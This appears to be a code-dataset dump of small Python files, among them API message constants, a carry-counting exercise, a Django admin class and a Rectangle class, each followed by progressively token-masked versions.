"STR_REGISTRATION_SUCCESS = 'Registration successful'\nSTR_LOGIN_SUCCESS = 'Login successful'\nSTR_INVALID_EMAIL = 'Invalid email id provided'\nSTR_INVALID_MOBILE = 'Invalid mobile number provided'\nSTR_INVALID_GENDER = 'Invalid gender provided'\nSTR_FAMILY_ADDITION_SUCCESS = 'Family added successfully'\nSTR_RELATIONSHIP_ADDITION_SUCCESS = 'Relationship added successfully'\nSTR_RELATIVES_ADDITION_SUCCESS = 'Relatives added successfully'\nSTR_INVALID_PERSON = 'User information not available'\nSTR_INVALID_RELATIONSHIP = 'User information not available'\nSTR_SEARCH_SUCCESS = 'Search retrieved successfully'\nSTR_LOGIN_FAILED = 'Mobile number or password is invalid'\n",
"<assignment token>\n"
] | false |
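Editor's note: the constants above are plain API response messages. A common way to consume them is a small helper that pairs a message with a status flag so every endpoint returns the same envelope. The sketch below is illustrative only: the helper name and the envelope keys are assumptions, and two of the constants are re-declared so it runs on its own.

# Hypothetical response helper around message constants like the ones above.
# The envelope keys ('success', 'message', 'data') are assumptions for illustration.
STR_LOGIN_SUCCESS = 'Login successful'
STR_LOGIN_FAILED = 'Mobile number or password is invalid'

def make_response(success, message, data=None):
    """Return a uniform response envelope for an API layer."""
    return {'success': success, 'message': message, 'data': data or {}}

def login(mobile, password, users):
    """Toy login check against an in-memory dict of mobile -> password."""
    if users.get(mobile) == password:
        return make_response(True, STR_LOGIN_SUCCESS, {'mobile': mobile})
    return make_response(False, STR_LOGIN_FAILED)

print(login('9999900000', 'secret', {'9999900000': 'secret'}))
print(login('9999900000', 'wrong', {'9999900000': 'secret'}))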
99,869 | e01aa97cf3364a9b5228c8e9efa9af0c1f665c0a | while True:
number_a, number_b = input().split()
if number_a == number_b == '0':
break
number_b = ('{:0>' + str(len(number_a)) + '}').format(number_b)
number_a = ('{:0>' + str(len(number_b)) + '}').format(number_a)
carry = 0
total_carries = 0
for i in reversed(range(len(number_a))):
carry = int(int(number_a[i]) + int(number_b[i]) + carry > 9)
total_carries += carry
if total_carries == 0:
print('No carry operation.')
elif total_carries == 1:
print('1 carry operation.')
else:
print('{} carry operations.'.format(total_carries))
| [
"while True:\n number_a, number_b = input().split()\n if number_a == number_b == '0':\n break\n\n number_b = ('{:0>' + str(len(number_a)) + '}').format(number_b)\n number_a = ('{:0>' + str(len(number_b)) + '}').format(number_a)\n\n carry = 0\n total_carries = 0\n for i in reversed(range(len(number_a))):\n carry = int(int(number_a[i]) + int(number_b[i]) + carry > 9)\n total_carries += carry\n if total_carries == 0:\n print('No carry operation.')\n elif total_carries == 1:\n print('1 carry operation.')\n else:\n print('{} carry operations.'.format(total_carries))\n",
"while True:\n number_a, number_b = input().split()\n if number_a == number_b == '0':\n break\n number_b = ('{:0>' + str(len(number_a)) + '}').format(number_b)\n number_a = ('{:0>' + str(len(number_b)) + '}').format(number_a)\n carry = 0\n total_carries = 0\n for i in reversed(range(len(number_a))):\n carry = int(int(number_a[i]) + int(number_b[i]) + carry > 9)\n total_carries += carry\n if total_carries == 0:\n print('No carry operation.')\n elif total_carries == 1:\n print('1 carry operation.')\n else:\n print('{} carry operations.'.format(total_carries))\n",
"<code token>\n"
] | false |
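Editor's note: the loop above counts carry operations digit by digit after zero-padding both operands to the same width. A function form of the same idea, with sanity checks matching the classic "Primary Arithmetic" sample cases, is sketched below; the function name is not part of the original program.

# Function form of the carry-counting loop above; the name count_carries is illustrative.
def count_carries(a, b):
    """Count carry operations when adding the decimal strings a and b."""
    width = max(len(a), len(b))
    a, b = a.zfill(width), b.zfill(width)   # same zero-padding as the '{:0>N}' formats
    carry = total = 0
    for da, db in zip(reversed(a), reversed(b)):
        carry = int(int(da) + int(db) + carry > 9)
        total += carry
    return total

# Sanity checks matching the expected outputs of the original program.
assert count_carries('123', '456') == 0      # "No carry operation."
assert count_carries('555', '555') == 3      # "3 carry operations."
assert count_carries('123', '594') == 1      # "1 carry operation."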
99,870 | 7a34812cd7bdb4052dc58327f1fe35e6082e0c27 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from userApp.models import Petugas, Anggota
from django.contrib.auth.models import User
# Register your models here.
class AnggotaAdmin(admin.ModelAdmin):
list_per_page = 10
list_display = ('nis','nama','jk','agama','ttl','alamat','get_email',
'get_username')
list_filter = ('jk','agama')
search_fields = ('nis','nama','ttl','get_username')
def get_username(self, obj):
return obj.user.username
get_username.short_description = 'User'
get_username.admin_order_field = 'user__username'
def get_email(self, obj):
return obj.user.email
get_email.short_description = 'User'
get_email.admin_order_field = 'user__email'
# def get_status_siswa(self, obj):
# return obj.user.is_active
# get_status.short_description = 'User'
# get_status.admin_order_field = 'user__is_active'
admin.site.register(Petugas)
admin.site.register(Anggota,AnggotaAdmin)
| [
"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\nfrom django.contrib import admin\nfrom userApp.models import Petugas, Anggota\nfrom django.contrib.auth.models import User\n\n# Register your models here.\nclass AnggotaAdmin(admin.ModelAdmin):\n\tlist_per_page = 10\n\tlist_display = ('nis','nama','jk','agama','ttl','alamat','get_email',\n\t\t'get_username')\n\tlist_filter = ('jk','agama')\n\tsearch_fields = ('nis','nama','ttl','get_username')\n\n\tdef get_username(self, obj):\n\t\treturn obj.user.username\n\tget_username.short_description = 'User'\n\tget_username.admin_order_field = 'user__username'\n\n\tdef get_email(self, obj):\n\t\treturn obj.user.email\n\tget_email.short_description = 'User'\n\tget_email.admin_order_field = 'user__email'\n\n\t# def get_status_siswa(self, obj):\n\t# \treturn obj.user.is_active\n\t# get_status.short_description = 'User'\n\t# get_status.admin_order_field = 'user__is_active'\n\nadmin.site.register(Petugas)\nadmin.site.register(Anggota,AnggotaAdmin)\n",
"from __future__ import unicode_literals\nfrom django.contrib import admin\nfrom userApp.models import Petugas, Anggota\nfrom django.contrib.auth.models import User\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n list_per_page = 10\n list_display = ('nis', 'nama', 'jk', 'agama', 'ttl', 'alamat',\n 'get_email', 'get_username')\n list_filter = 'jk', 'agama'\n search_fields = 'nis', 'nama', 'ttl', 'get_username'\n\n def get_username(self, obj):\n return obj.user.username\n get_username.short_description = 'User'\n get_username.admin_order_field = 'user__username'\n\n def get_email(self, obj):\n return obj.user.email\n get_email.short_description = 'User'\n get_email.admin_order_field = 'user__email'\n\n\nadmin.site.register(Petugas)\nadmin.site.register(Anggota, AnggotaAdmin)\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n list_per_page = 10\n list_display = ('nis', 'nama', 'jk', 'agama', 'ttl', 'alamat',\n 'get_email', 'get_username')\n list_filter = 'jk', 'agama'\n search_fields = 'nis', 'nama', 'ttl', 'get_username'\n\n def get_username(self, obj):\n return obj.user.username\n get_username.short_description = 'User'\n get_username.admin_order_field = 'user__username'\n\n def get_email(self, obj):\n return obj.user.email\n get_email.short_description = 'User'\n get_email.admin_order_field = 'user__email'\n\n\nadmin.site.register(Petugas)\nadmin.site.register(Anggota, AnggotaAdmin)\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n list_per_page = 10\n list_display = ('nis', 'nama', 'jk', 'agama', 'ttl', 'alamat',\n 'get_email', 'get_username')\n list_filter = 'jk', 'agama'\n search_fields = 'nis', 'nama', 'ttl', 'get_username'\n\n def get_username(self, obj):\n return obj.user.username\n get_username.short_description = 'User'\n get_username.admin_order_field = 'user__username'\n\n def get_email(self, obj):\n return obj.user.email\n get_email.short_description = 'User'\n get_email.admin_order_field = 'user__email'\n\n\n<code token>\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_username(self, obj):\n return obj.user.username\n <assignment token>\n <assignment token>\n\n def get_email(self, obj):\n return obj.user.email\n <assignment token>\n <assignment token>\n\n\n<code token>\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <assignment token>\n <assignment token>\n\n def get_email(self, obj):\n return obj.user.email\n <assignment token>\n <assignment token>\n\n\n<code token>\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <assignment token>\n <assignment token>\n <function token>\n <assignment token>\n <assignment token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<code token>\n"
] | false |
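Editor's note: the admin class above reads obj.user.username and obj.user.email, which implies Anggota holds a one-to-one link to Django's User model; note also that Django's search_fields expects model field lookups (e.g. 'user__username') rather than admin method names such as 'get_username'. Below is a minimal sketch of the models this admin appears to assume. Field names other than user, nis, and nama are guesses, and the snippet only imports inside a configured Django project.

# Sketch of models consistent with userApp/admin.py above; field choices are assumptions.
from django.contrib.auth.models import User
from django.db import models


class Petugas(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    nama = models.CharField(max_length=100)

    def __str__(self):
        return self.nama


class Anggota(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    nis = models.CharField(max_length=20, unique=True)
    nama = models.CharField(max_length=100)
    jk = models.CharField(max_length=1, choices=[('L', 'Laki-laki'), ('P', 'Perempuan')])
    agama = models.CharField(max_length=20)
    ttl = models.CharField(max_length=100)   # tempat/tanggal lahir
    alamat = models.TextField()

    def __str__(self):
        return self.nama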
99,871 | 96bc5fcb19aa262418b96c1543b2726d0e77254a | #!/usr/bin/python3
""" Module that defines Rectangle class (inherits from Base) """
from models.base import Base
class Rectangle(Base):
""" Defines attributes and methods of Rectangle class """
def __init__(self, width, height, x=0, y=0, id=None):
""" Instantiates all attributes of class """
self.width = width
self.height = height
self.x = x
self.y = y
super().__init__(id)
def data_validator(self, name, value):
""" Validates proper integer input """
if type(value) is not int:
raise TypeError("{} must be an integer".format(name))
if name == "height" or name == "width":
if value <= 0:
raise ValueError("{} must be > 0".format(name))
else:
if value < 0:
raise ValueError("{} must be >= 0".format(name))
def area(self):
""" Calculates area """
return self.width * self.height
def display(self):
""" Prints rectangle instance of #s """
""" Coordinates for position are x-axis (LR) and y-axis (NS) """
for coordY in range(self.y):
print()
for column in range(self.height):
for coordLR in range(self.x):
print(" ", end="")
for row in range(self.width):
print("#", end="")
print()
def update(self, *args, **kwargs):
""" Updates attribute values after initialization """
arg_name = ['id', 'width', 'height', 'x', 'y']
""" If args only, sets attribute to correct arg_name """
if len(args) > 0:
numArgs = 0
for attr in range(len(args)):
setattr(self, arg_name[numArgs], args[numArgs])
numArgs += 1
""" Put kwargs into dict - if key matches arg_name, set to value """
kwargs_dict = kwargs
for key, value in kwargs_dict.items():
for attr in range(len(arg_name)):
if key == arg_name[attr]:
setattr(self, arg_name[attr], value)
def to_dictionary(self):
""" Returns dictionary representation of rectangle """
dict_rect = {}
dict_rect["id"] = self.id
dict_rect["width"] = self.width
dict_rect["height"] = self.height
dict_rect["x"] = self.x
dict_rect["y"] = self.y
return dict_rect
def __str__(self):
""" Builtin that produces readable output """
return "[{}] ({}) {}/{} - {}/{}".format(self.__class__.__name__,
self.id, self.x, self.y,
self.width, self.height)
@property
def width(self):
""" Gets private width attribute """
return self.__width
@width.setter
def width(self, value):
""" Sets width attribute with exceptions """
self.data_validator("width", value)
self.__width = value
@property
def height(self):
""" Gets private height attribute """
return self.__height
@height.setter
def height(self, value):
""" Sets height attribute with exceptions """
self.data_validator("height", value)
self.__height = value
@property
def x(self):
""" Gets private x attribute """
return self.__x
@x.setter
def x(self, value):
""" Sets x attribute with exceptions """
self.data_validator("x", value)
self.__x = value
@property
def y(self):
""" Gets private y attribute """
return self.__y
@y.setter
def y(self, value):
""" Sets y attribute with exceptions """
self.data_validator("y", value)
self.__y = value
| [
"#!/usr/bin/python3\n\n\"\"\" Module that defines Rectangle class (inherits from Base) \"\"\"\n\n\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" Defines attributes and methods of Rectangle class \"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError(\"{} must be an integer\".format(name))\n if name == \"height\" or name == \"width\":\n if value <= 0:\n raise ValueError(\"{} must be > 0\".format(name))\n else:\n if value < 0:\n raise ValueError(\"{} must be >= 0\".format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(\" \", end=\"\")\n for row in range(self.width):\n print(\"#\", end=\"\")\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect[\"id\"] = self.id\n dict_rect[\"width\"] = self.width\n dict_rect[\"height\"] = self.height\n dict_rect[\"x\"] = self.x\n dict_rect[\"y\"] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".format(self.__class__.__name__,\n self.id, self.x, self.y,\n self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator(\"width\", value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator(\"height\", value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator(\"x\", value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y attribute with exceptions \"\"\"\n self.data_validator(\"y\", value)\n self.__y = value\n",
"<docstring token>\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" Defines attributes and methods of Rectangle class \"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y attribute with exceptions \"\"\"\n self.data_validator('y', value)\n self.__y = value\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n \"\"\" Defines attributes and methods of Rectangle class \"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y attribute with exceptions \"\"\"\n self.data_validator('y', value)\n self.__y = value\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y attribute with exceptions \"\"\"\n self.data_validator('y', value)\n self.__y = value\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n 